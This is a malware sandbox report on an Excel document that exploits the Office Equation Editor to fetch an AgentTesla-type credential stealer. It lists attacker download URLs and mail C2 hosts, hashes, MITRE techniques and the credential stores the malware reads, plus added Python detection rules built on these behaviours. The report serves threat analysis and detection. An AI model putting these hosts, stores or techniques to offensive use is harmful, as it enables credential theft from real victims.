Source: Yara match | File source: Process Memory Space: Nwefile.exe PID: 2792, type: MEMORY
Source: Yara match | File source: Process Memory Space: Nwefile.exe PID: 2664, type: MEMORY
Source: Yara match | File source: Process Memory Space: Nwefile.exe PID: 2768, type: MEMORY
Source: Yara match | File source: 8.2.Nwefile.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.Nwefile.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.Nwefile.exe.33d6ac0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.Nwefile.exe.33d6ac0.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.joewealth28743.exe.36b6ac0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.joewealth28743.exe.36b6ac0.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.joewealth28743.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.Nwefile.exe.3656ac0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.Nwefile.exe.3656ac0.5.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

Techniques matched in this analysis, by tactic (the digits after a technique are the signature-count badges as shown in the report matrix; tactics with no matched technique are listed as none):

Initial Access: none
Execution: Windows Management Instrumentation 211; Exploitation for Client Execution 13
Persistence: Registry Run Keys / Startup Folder 1
Privilege Escalation: Process Injection 112; Registry Run Keys / Startup Folder 1
Defense Evasion: Disable or Modify Tools 1; Deobfuscate/Decode Files or Information 1; Obfuscated Files or Information 1; Software Packing 12; Timestomp 1; Masquerading 1; Virtualization/Sandbox Evasion 131; Process Injection 112; Hidden Files and Directories 1
Credential Access: OS Credential Dumping 2
Discovery: File and Directory Discovery 1; System Information Discovery 114; Security Software Discovery 311; Process Discovery 2; Virtualization/Sandbox Evasion 131; Application Window Discovery 1; Remote System Discovery 1
Lateral Movement: none
Collection: Archive Collected Data 11; Data from Local System 2; Email Collection 1; Clipboard Data 1
Exfiltration: none
Command and Control: Ingress Tool Transfer 12; Encrypted Channel 1; Non-Standard Port 1; Non-Application Layer Protocol 2; Application Layer Protocol 32
Network Effects: none
Remote Service Effects: none
Impact: none

                      Behavior Graph

Behavior Graph ID: 412910, Sample: 99feb78a_by_Libranalysis, Start date: 13/05/2021, Architecture: WINDOWS, Score: 100

Start-node signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Multi AV Scanner detection for domain / URL; Found malware configuration; 14 other signatures

Process tree recovered from the graph (node numbers as in the report):

EQNEDT32.EXE (7)
    DNS/IP: carbinz.gq 185.239.243.112, ports 49167, 80, CLOUDIE-AS-AP Cloudie Limited HK, Moldova Republic of
    Dropped: C:\Users\user\AppData\...\joewealth28743.exe (PE32); C:\Users\user\AppData\...\joewealthx[1].exe (PE32)
    Signature: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
    started joewealth28743.exe (18)
        Signatures: Multi AV Scanner detection for dropped file; Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines); Injects a PE file into a foreign processes
        started joewealth28743.exe (26)
            DNS/IP: mail.orienttech.com.qa 162.241.85.66, ports 49168, 49169, 49170, OIS1US, United States
            Dropped: C:\Users\user\AppData\Roaming\...\Nwefile.exe (PE32)
            Signatures: Tries to steal Mail credentials (via file access); Tries to harvest and steal ftp login credentials; Tries to harvest and steal browser information (history, passwords, etc); Hides that the sample has been downloaded from the Internet (zone.identifier)
Nwefile.exe (12)
    Signatures: Multi AV Scanner detection for dropped file; Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
    started Nwefile.exe (21)
Nwefile.exe (14)
    Signature: Injects a PE file into a foreign processes
    started Nwefile.exe (23)
        DNS/IP: mail.orienttech.com.qa
EXCEL.EXE (16)
    Dropped: C:\Users\...\~$99feb78a_by_Libranalysis.xlsx (data)


                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

Source | Detection | Scanner | Label
99feb78a_by_Libranalysis.xlsx | 39% | Virustotal |
99feb78a_by_Libranalysis.xlsx | 43% | ReversingLabs | Document-Office.Exploit.CVE-2017-11882
99feb78a_by_Libranalysis.xlsx | 100% | Joe Sandbox ML |

                      Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\joewealthx[1].exe | 49% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe | 49% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
C:\Users\user\AppData\Roaming\joewealth28743.exe | 49% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla

                      Unpacked PE Files

Source | Detection | Scanner | Label
8.2.Nwefile.exe.400000.1.unpack | 100% | Avira | HEUR/AGEN.1138205
6.2.Nwefile.exe.400000.1.unpack | 100% | Avira | HEUR/AGEN.1138205
4.2.joewealth28743.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1138205

                      Domains

Source | Detection | Scanner
carbinz.gq | 14% | Virustotal
mail.orienttech.com.qa | 2% | Virustotal

                      URLs

Source | Detection | Scanner | Label
http://127.0.0.1:HTTP/1.1 | 0% | Avira URL Cloud | safe
https://api.ipify.org%GETMozilla/5.0 | 0% | URL Reputation | safe
http://DynDns.comDynDNS | 0% | URL Reputation | safe
http://www.%s.comPA | 0% | URL Reputation | safe
http://mail.orienttech.com.qa | 2% | Virustotal |
http://mail.orienttech.com.qa | 0% | Avira URL Cloud | safe
http://yyfqMq.com | 0% | Avira URL Cloud | safe
https://YbUuTY812ORW4eX3VhL.com | 0% | Avira URL Cloud | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | 0% | URL Reputation | safe
https://api.ipify.org% | 0% | URL Reputation | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | 0% | URL Reputation | safe
http://carbinz.gq/modex/joewealthx.exe | 0% | Avira URL Cloud | safe

                      Domains and IPs

                      Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
carbinz.gq | 185.239.243.112 | true | true | - | unknown
mail.orienttech.com.qa | 162.241.85.66 | true | true | - | unknown

                      Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://carbinz.gq/modex/joewealthx.exe | true | Avira URL Cloud: safe | unknown

                      URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://127.0.0.1:HTTP/1.1 | joewealth28743.exe, 00000004.00000002.2352749717.00000000023B1000.00000004.00000001.sdmp, Nwefile.exe, 00000006.00000002.2237439431.00000000021A1000.00000004.00000001.sdmp, Nwefile.exe, 00000008.00000002.2352252684.0000000002371000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
https://api.ipify.org%GETMozilla/5.0 | Nwefile.exe, 00000008.00000002.2352252684.0000000002371000.00000004.00000001.sdmp | false | URL Reputation: safe | low
http://DynDns.comDynDNS | Nwefile.exe, 00000008.00000002.2352252684.0000000002371000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.%s.comPA | joewealth28743.exe, 00000004.00000002.2357578553.0000000005BE0000.00000002.00000001.sdmp, Nwefile.exe, 00000006.00000002.2240959548.0000000005E30000.00000002.00000001.sdmp | false | URL Reputation: safe | low
http://mail.orienttech.com.qa | joewealth28743.exe, 00000004.00000002.2353553201.000000000260C000.00000004.00000001.sdmp, Nwefile.exe, 00000008.00000002.2352689728.0000000002498000.00000004.00000001.sdmp | false | Virustotal: 2%; Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | joewealth28743.exe, 00000004.00000002.2357578553.0000000005BE0000.00000002.00000001.sdmp, Nwefile.exe, 00000006.00000002.2240959548.0000000005E30000.00000002.00000001.sdmp | false | - | high
http://yyfqMq.com | Nwefile.exe, 00000008.00000002.2352252684.0000000002371000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://YbUuTY812ORW4eX3VhL.com | joewealth28743.exe, 00000004.00000002.2353787746.000000000278B000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | joewealth28743.exe, 00000004.00000002.2352749717.00000000023B1000.00000004.00000001.sdmp, Nwefile.exe, 00000006.00000002.2237439431.00000000021A1000.00000004.00000001.sdmp, Nwefile.exe, 00000008.00000002.2352252684.0000000002371000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://api.ipify.org% | joewealth28743.exe, 00000004.00000002.2352896428.000000000243A000.00000004.00000001.sdmp | false | URL Reputation: safe | low
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | joewealth28743.exe, 00000003.00000002.2143882626.000000000361B000.00000004.00000001.sdmp, joewealth28743.exe, 00000004.00000002.2351274027.0000000000402000.00000040.00000001.sdmp, Nwefile.exe, 00000005.00000002.2216387056.000000000333B000.00000004.00000001.sdmp, Nwefile.exe, 00000006.00000002.2236823411.0000000000402000.00000040.00000001.sdmp, Nwefile.exe, 00000007.00000002.2239066475.00000000035BB000.00000004.00000001.sdmp, Nwefile.exe, 00000008.00000002.2351324007.0000000000402000.00000040.00000001.sdmp | false | URL Reputation: safe | unknown

                        Contacted IPs


                        Public

IP | Domain | Country | ASN | ASN Name | Malicious
162.241.85.66 | mail.orienttech.com.qa | United States | 26337 | OIS1US | true
185.239.243.112 | carbinz.gq | Moldova Republic of | 55933 | CLOUDIE-AS-AP Cloudie Limited HK | true

                        General Information

                        Joe Sandbox Version:32.0.0 Black Diamond
                        Analysis ID:412910
                        Start date:13.05.2021
                        Start time:03:21:11
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 11m 59s
                        Hypervisor based Inspection enabled:false
                        Report type:light
                        Sample file name:99feb78a_by_Libranalysis (renamed file extension from none to xlsx)
                        Cookbook file name:defaultwindowsofficecookbook.jbs
                        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed:9
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal100.troj.spyw.expl.evad.winXLSX@12/4@14/2
                        EGA Information:Failed
                        HDC Information:
                        • Successful, ratio: 2% (good quality ratio 1.4%)
                        • Quality average: 41%
                        • Quality standard deviation: 33.9%
                        HCA Information:
                        • Successful, ratio: 99%
                        • Number of executed functions: 0
                        • Number of non-executed functions: 0
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI
                        • Found Word or Excel or PowerPoint or XPS Viewer
                        • Attach to Office via COM
                        • Active ActiveX Object
                        • Scroll down
                        • Close Viewer
                        Warnings:
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • TCP Packets have been reduced to 100
                        • Report size exceeded maximum capacity and may have missing disassembly code.
                        • Report size getting too big, too many NtCreateFile calls found.
                        • Report size getting too big, too many NtEnumerateValueKey calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.

                        Simulations

                        Behavior and APIs

Time | Type | Description
03:22:00 | API Interceptor | 43x Sleep call for process: EQNEDT32.EXE modified
03:22:02 | API Interceptor | 1211x Sleep call for process: joewealth28743.exe modified
03:22:28 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Nwefile C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe
03:22:36 | API Interceptor | 854x Sleep call for process: Nwefile.exe modified
03:22:36 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Nwefile C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe
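The process chain in the behavior graph above (EQNEDT32.EXE fetching and starting joewealth28743.exe, which then reads the Chrome, Firefox, FileZilla, SmartFTP and Thunderbird credential stores) and the two Run-key autostart entries in this Simulations table are the behaviours a detection engineer would want to alert on. The Python below is an added example and is not part of the Joe Sandbox report or its Sigma rules: it runs five constructed rules over constructed, Sysmon-like telemetry records modelled on this report. The event shape, the rule names, the owner-process mapping and the two benign records are assumptions made for the example.

```python
"""Constructed detection rules for the behaviour seen in this report.

Added example, not Joe Sandbox code. Event records are a simplified,
constructed telemetry shape (Sysmon-like) with these kinds:
process_create, network_connect, file_create, file_open, registry_set.
"""
import ntpath

# Credential stores the sample opened, mapped to the application that
# legitimately reads each one (assumed owner process names).
CRED_STORES = {
    r"\Google\Chrome\User Data\Default\Login Data": "chrome.exe",
    r"\Mozilla\Firefox\profiles.ini": "firefox.exe",
    r"\FileZilla\recentservers.xml": "filezilla.exe",
    r"\SmartFTP\Client 2.0\Favorites\Quick Connect": "smartftp.exe",
    r"\Thunderbird\profiles.ini": "thunderbird.exe",
}
RUN_KEY = "\\software\\microsoft\\windows\\currentversion\\run\\"


def basename(path: str) -> str:
    """Case-folded file name of a Windows path (works on any host OS)."""
    return ntpath.basename(path).lower()


def under_appdata(path: str) -> bool:
    """True when the path lies below a user's AppData directory."""
    return "\\appdata\\" in path.lower()


def detect(events):
    """Return (rule, detail) pairs for every event that matches a rule."""
    hits = []
    for ev in events:
        kind, image = ev["kind"], ev["image"]
        from_eqnedt = basename(image) == "eqnedt32.exe"
        if kind == "process_create" and basename(ev["parent"]) == "eqnedt32.exe":
            # Equation Editor has no legitimate reason to spawn anything.
            hits.append(("eqnedt32_spawns_process", image))
        elif kind == "network_connect" and from_eqnedt:
            hits.append(("eqnedt32_network_connection", f"{ev['dest_ip']}:{ev['dest_port']}"))
        elif kind == "file_create" and from_eqnedt and under_appdata(ev["target"]):
            hits.append(("eqnedt32_writes_appdata", ev["target"]))
        elif kind == "file_open":
            target = ev["target"].lower()
            for fragment, owner in CRED_STORES.items():
                if fragment.lower() in target and basename(image) != owner:
                    hits.append(("credential_store_read_by_foreign_process", image))
        elif kind == "registry_set" and RUN_KEY in ev["target"].lower() and under_appdata(ev["details"]):
            # Run-key value pointing into a user-writable AppData directory.
            hits.append(("run_key_points_into_appdata", ev["details"]))
    return hits


# Constructed sample telemetry modelled on the report's process chain;
# the two benign records show that the rules stay quiet on normal activity.
EQNEDT = r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
DROPPER = r"C:\Users\user\AppData\Roaming\joewealth28743.exe"
PERSIST = r"C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe"
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
LOGIN_DATA = r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"
RUN_NWEFILE = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Nwefile"

EVENTS = [
    # EQNEDT32.EXE is started through DCOM, so its parent is svchost.exe, not Excel.
    {"kind": "process_create", "image": EQNEDT, "parent": r"C:\Windows\System32\svchost.exe"},
    {"kind": "network_connect", "image": EQNEDT, "dest_ip": "185.239.243.112", "dest_port": 80},
    {"kind": "file_create", "image": EQNEDT, "target": DROPPER},
    {"kind": "process_create", "image": DROPPER, "parent": EQNEDT},
    {"kind": "file_open", "image": DROPPER, "target": LOGIN_DATA},
    {"kind": "file_open", "image": CHROME, "target": LOGIN_DATA},            # benign
    {"kind": "registry_set", "image": DROPPER, "target": RUN_NWEFILE, "details": PERSIST},
    {"kind": "registry_set", "image": r"C:\Windows\System32\msiexec.exe",     # benign
     "target": r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Vendor",
     "details": r"C:\Program Files\Vendor\agent.exe"},
]

if __name__ == "__main__":
    for rule, detail in detect(EVENTS):
        print(f"{rule:45} {detail}")
```

Two points the rules encode: EQNEDT32.EXE is launched by DCOM, so its parent is svchost.exe rather than EXCEL.EXE, and the rules therefore key on the Equation Editor binary as parent or image instead of on the Office process; and because Microsoft removed the Equation Editor in the January 2018 security update, any execution of EQNEDT32.EXE on a patched host is itself worth investigating, before it spawns, connects or writes anything.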

                        Joe Sandbox View / Context

                        IPs

Match | Associated Sample Name / URL | Detection | Context
162.241.85.66 | Order QID R.exe | malicious |
162.241.85.66 | scan doc_pdf.exe | malicious |
162.241.85.66 | payment invoice.doc | malicious |
162.241.85.66 | payment receipt.doc | malicious |
162.241.85.66 | wealthsecx.exe | malicious |
162.241.85.66 | Bank receipt.doc | malicious |
162.241.85.66 | 07BhuWSD6z.exe | malicious |
162.241.85.66 | LIST OF ITEMS.doc | malicious |
162.241.85.66 | Drawings_pdf.exe | malicious |
162.241.85.66 | PO No. 2995_pdf.exe | malicious |
185.239.243.112 | wed.doc | malicious | vespang.ga/epicc/jo/2bZYXtMN07sLYoY.exe
185.239.243.112 | ORDER CONFIRMATION.doc | malicious | vespang.ga/epicc/bills/iLvdKqmuKQkvQsj.exe
185.239.243.112 | abc8a77f_by_Libranalysis.xlsx | malicious | vespang.ga/favico/mbop.exe
185.239.243.112 | RFQ Plasma cutting machine.doc | malicious | vespang.ga/epicc/jaa/KSSL9sczaa9rCRx.exe
185.239.243.112 | Price List.doc | malicious | vespang.ga/discovery/yg/s1XvWL9frR0j2U7.exe
185.239.243.112 | Enq 557.doc | malicious | vespang.ga/power/dj/PM7uJ2f7U1BfNfQ.exe
185.239.243.112 | b98b396b_by_Libranalysis.xlsx | malicious | carbinz.gq/modex/chungx.exe
185.239.243.112 | f8198274_by_Libranalysis.xlsx | malicious | vespang.ga/favico/bdell.exe
185.239.243.112 | PO 4302003683.doc | malicious | vespang.ga/gunns/fada/j5nRNKhh75Uhr2l.exe
185.239.243.112 | Tender Overview 10052021.doc | malicious | vespang.ga/discovery/lik/ALXxGkCQUwQUkab.exe
185.239.243.112 | ORDER 10.05.doc | malicious | vespang.ga/gunns/jojo/axD70r2UMtC1a0x.exe
185.239.243.112 | purchase request.doc | malicious | vespang.ga/gunns/dj/HxYnDK2UQPV8rvj.exe
185.239.243.112 | Payment Swift.doc | malicious | carbinz.gq/modex/prosperx.exe
185.239.243.112 | NEW ORDER LIST.doc | malicious | vespang.ga/gunns/pop/tUuDajpoTJVbvlB.exe
185.239.243.112 | Company Profile.doc | malicious | vespang.ga/gunns/jas/qI7c2elxsuXF0OB.exe
185.239.243.112 | RFQ KR-21-087.doc | malicious | vespang.ga/epic/ziko/9OnQqWMQOlva2b1.exe
185.239.243.112 | INQUIRY 71652628.doc | malicious | vespang.ga/epic/ok/DEAGdmkYSe4x7Hi.exe
185.239.243.112 | Payment Note.xlsx | malicious | carbinz.gq/modex/kellyx.exe
185.239.243.112 | aea58eb7_by_Libranalysis.xlsx | malicious | carbinz.gq/modex/shakix.exe
185.239.243.112 | a37e9308_by_Libranalysis.xlsx | malicious | vespang.ga/favico/obn.exe

                                            Domains

                                            Match | Associated Sample Name / URL | Detection | Context
                                            carbinz.gq | b98b396b_by_Libranalysis.xlsx | malicious | 185.239.243.112
                                            carbinz.gq | Payment Swift.doc | malicious | 185.239.243.112
                                            carbinz.gq | Payment Note.xlsx | malicious | 185.239.243.112
                                            carbinz.gq | aea58eb7_by_Libranalysis.xlsx | malicious | 185.239.243.112
                                            carbinz.gq | PO_001412.doc | malicious | 185.239.243.112
                                            carbinz.gq | items.doc | malicious | 185.239.243.112
                                            carbinz.gq | RFQ INQ HCH2323ED.doc | malicious | 185.239.243.112
                                            carbinz.gq | c8080fbf_by_Libranalysis.rtf | malicious | 185.239.243.112
                                            carbinz.gq | Inquiry 05042021.doc | malicious | 185.239.243.112
                                            carbinz.gq | machine spares .doc | malicious | 185.239.243.112
                                            carbinz.gq | SWIFT COPY.doc | malicious | 185.239.243.112
                                            carbinz.gq | HCU213DES.doc | malicious | 185.239.243.112
                                            carbinz.gq | PO 9661641.doc | malicious | 185.239.243.112
                                            carbinz.gq | DocNo2300058329.doc__.rtf | malicious | 185.239.243.112
                                            carbinz.gq | payment invoice.doc | malicious | 185.239.243.112
                                            carbinz.gq | Request for New Quote - Valve Ist Order.doc | malicious | 185.239.243.112
                                            carbinz.gq | INV 57474545.doc | malicious | 185.239.243.112
                                            carbinz.gq | Request for Quotation_28042021.doc | malicious | 185.239.243.112
                                            carbinz.gq | Signed Contract.doc | malicious | 185.239.243.112
                                            carbinz.gq | DVO100024000.doc | malicious | 185.239.243.112
                                            mail.orienttech.com.qa | Order QID R.exe | malicious | 162.241.85.66
                                            mail.orienttech.com.qa | scan doc_pdf.exe | malicious | 162.241.85.66
                                            mail.orienttech.com.qa | payment invoice.doc | malicious | 162.241.85.66
                                            mail.orienttech.com.qa | SecuriteInfo.com.Trojan.Siggen13.10233.30629.exe | malicious | 162.241.85.66
                                            mail.orienttech.com.qa | payment receipt.doc | malicious | 162.241.85.66
                                            mail.orienttech.com.qa | cLQd2QVOWu.exe | malicious | 162.241.85.66
                                            mail.orienttech.com.qa | wealthsecx.exe | malicious | 162.241.85.66
                                            mail.orienttech.com.qa | Bank receipt.doc | malicious | 162.241.85.66
                                            mail.orienttech.com.qa | 07BhuWSD6z.exe | malicious | 162.241.85.66
                                            mail.orienttech.com.qa | LIST OF ITEMS.doc | malicious | 162.241.85.66
                                            mail.orienttech.com.qa | Drawings_pdf.exe | malicious | 162.241.85.66
                                            mail.orienttech.com.qa | PO#BC210243_pdf.exe | malicious | 162.241.85.66
                                            mail.orienttech.com.qa | enquries.pdf.exe | malicious | 162.241.85.66
                                            mail.orienttech.com.qa | SecuriteInfo.com.Artemis9DECF18E822A.1711.exe | malicious | 162.241.85.66
                                            mail.orienttech.com.qa | PO No. 2995_pdf.exe | malicious | 162.241.85.66
                                            mail.orienttech.com.qa | 0603321WG_0_1 pdf.exe | malicious | 162.241.85.66

                                            ASN

                                            Match | Associated Sample Name / URL | Detection | Context
                                            OIS1US | statistic-482095214.xls | malicious | 162.241.2.77
                                            OIS1US | statistic-482095214.xls | malicious | 162.241.2.77
                                            OIS1US | Order QID R.exe | malicious | 162.241.85.66
                                            OIS1US | slot Charges.exe | malicious | 162.241.85.231
                                            OIS1US | scan doc_pdf.exe | malicious | 162.241.85.66
                                            OIS1US | generated order 257404.xlsm | malicious | 162.241.85.241
                                            OIS1US | 9e7d034c_by_Libranalysis.xlsm | malicious | 162.241.2.137
                                            OIS1US | SecuriteInfo.com.VB.Trojan.Valyria.4579.10155.xlsm | malicious | 162.241.2.137
                                            OIS1US | SecuriteInfo.com.VB.Trojan.Valyria.4579.10155.xlsm | malicious | 162.241.2.137
                                            OIS1US | SecuriteInfo.com.VB.Trojan.Valyria.4579.18506.xlsm | malicious | 162.241.2.137
                                            OIS1US | 11710b54_by_Libranalysis.exe | malicious | 192.185.147.20
                                            OIS1US | a37e9308_by_Libranalysis.xlsx | malicious | 192.185.147.20
                                            OIS1US | 8c2d96ab_by_Libranalysis.exe | malicious | 162.241.85.231
                                            OIS1US | 4GGwmv0AJm.exe | malicious | 192.185.147.148
                                            OIS1US | payment invoice.doc | malicious | 162.241.85.66
                                            OIS1US | Purchase Order_.exe | malicious | 162.241.85.194
                                            OIS1US | INVOICES..exe | malicious | 162.241.85.194
                                            OIS1US | INVOICE.pdf'.exe | malicious | 162.241.85.194
                                            OIS1US | svch.exe | malicious | 162.241.2.107
                                            OIS1US | payment receipt.doc | malicious | 162.241.85.66
                                            CLOUDIE-AS-APCloudieLimitedHK | POusOmLR11.exe | malicious | 185.227.153.177
                                            CLOUDIE-AS-APCloudieLimitedHK | Gyxrui4Itd.exe | malicious | 185.227.153.177
                                            CLOUDIE-AS-APCloudieLimitedHK | wed.doc | malicious | 185.239.243.112
                                            CLOUDIE-AS-APCloudieLimitedHK | ORDER CONFIRMATION.doc | malicious | 185.239.243.112
                                            CLOUDIE-AS-APCloudieLimitedHK | abc8a77f_by_Libranalysis.xlsx | malicious | 185.239.243.112
                                            CLOUDIE-AS-APCloudieLimitedHK | RFQ Plasma cutting machine.doc | malicious | 185.239.243.112
                                            CLOUDIE-AS-APCloudieLimitedHK | Price List.doc | malicious | 185.239.243.112
                                            CLOUDIE-AS-APCloudieLimitedHK | Enq 557.doc | malicious | 185.239.243.112
                                            CLOUDIE-AS-APCloudieLimitedHK | b98b396b_by_Libranalysis.xlsx | malicious | 185.239.243.112
                                            CLOUDIE-AS-APCloudieLimitedHK | f8198274_by_Libranalysis.xlsx | malicious | 185.239.243.112
                                            CLOUDIE-AS-APCloudieLimitedHK | PO 4302003683.doc | malicious | 185.239.243.112
                                            CLOUDIE-AS-APCloudieLimitedHK | Tender Overview 10052021.doc | malicious | 185.239.243.112
                                            CLOUDIE-AS-APCloudieLimitedHK | ORDER 10.05.doc | malicious | 185.239.243.112
                                            CLOUDIE-AS-APCloudieLimitedHK | purchase request.doc | malicious | 185.239.243.112
                                            CLOUDIE-AS-APCloudieLimitedHK | Payment Swift.doc | malicious | 185.239.243.112
                                            CLOUDIE-AS-APCloudieLimitedHK | NEW ORDER LIST.doc | malicious | 185.239.243.112
                                            CLOUDIE-AS-APCloudieLimitedHK | Company Profile.doc | malicious | 185.239.243.112
                                            CLOUDIE-AS-APCloudieLimitedHK | RFQ KR-21-087.doc | malicious | 185.239.243.112
                                            CLOUDIE-AS-APCloudieLimitedHK | INQUIRY 71652628.doc | malicious | 185.239.243.112
                                            CLOUDIE-AS-APCloudieLimitedHK | Payment Note.xlsx | malicious | 185.239.243.112

                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\joewealthx[1].exe
                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Category:downloaded
                                            Size (bytes):758272
                                            Entropy (8bit):7.295996200857929
                                            Encrypted:false
                                            SSDEEP:12288:QoLLoS60/K7yh0AGWPlPjC6EPOyZoTRXq0R193e4hyOVj4:QoLAPWtP7uDK5R1p8Oq
                                            MD5:0B4CC13DE8C54ADD5149B56649B3F680
                                            SHA1:4FB70EDD4A74EA99D93225D8FC2901F699F1140F
                                            SHA-256:579D75FB8F8F893D2E1AE2845FC40E21EAB07AA6601B235E8C77F6E52956EF1A
                                            SHA-512:37A087FA83253AEE38EA440961A402F178EEB1209076E635B12DC829AAED691F81FFA637D148864AD8DACAD9BA66319A8605E71BBABC952F514F654B7FDE99C5
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 49%
                                            Reputation:low
                                            IE Cache URL:http://carbinz.gq/modex/joewealthx.exe
                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5L...............0................. ........@.. ....................................@.....................................O...................................l................................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........e...~......v....................................................0...........r...p.+..*..0...........r...p.+..*".(.....*.0..C........(L...&............( ...h}........(!...h}.......("... ......(V...&*>...(#...(.....*..0..C........(L...&............( ...h}........(!...h}.......("... ......(V...&*>...(#...(.....*..0..2..........($.....(%........,...("......(&....('...(.....*>...(#...(.....*...0................b`.+..*...("... .......( ...h..(!...h(....(Q...&*..0..........
                                            C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe
                                            Process:C:\Users\user\AppData\Roaming\joewealth28743.exe
                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Category:dropped
                                            Size (bytes):758272
                                            Entropy (8bit):7.295996200857929
                                            Encrypted:false
                                            SSDEEP:12288:QoLLoS60/K7yh0AGWPlPjC6EPOyZoTRXq0R193e4hyOVj4:QoLAPWtP7uDK5R1p8Oq
                                            MD5:0B4CC13DE8C54ADD5149B56649B3F680
                                            SHA1:4FB70EDD4A74EA99D93225D8FC2901F699F1140F
                                            SHA-256:579D75FB8F8F893D2E1AE2845FC40E21EAB07AA6601B235E8C77F6E52956EF1A
                                            SHA-512:37A087FA83253AEE38EA440961A402F178EEB1209076E635B12DC829AAED691F81FFA637D148864AD8DACAD9BA66319A8605E71BBABC952F514F654B7FDE99C5
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 49%
                                            Reputation:low
                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5L...............0................. ........@.. ....................................@.....................................O...................................l................................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........e...~......v....................................................0...........r...p.+..*..0...........r...p.+..*".(.....*.0..C........(L...&............( ...h}........(!...h}.......("... ......(V...&*>...(#...(.....*..0..C........(L...&............( ...h}........(!...h}.......("... ......(V...&*>...(#...(.....*..0..2..........($.....(%........,...("......(&....('...(.....*>...(#...(.....*...0................b`.+..*...("... .......( ...h..(!...h(....(Q...&*..0..........
                                            C:\Users\user\AppData\Roaming\joewealth28743.exe
                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Category:dropped
                                            Size (bytes):758272
                                            Entropy (8bit):7.295996200857929
                                            Encrypted:false
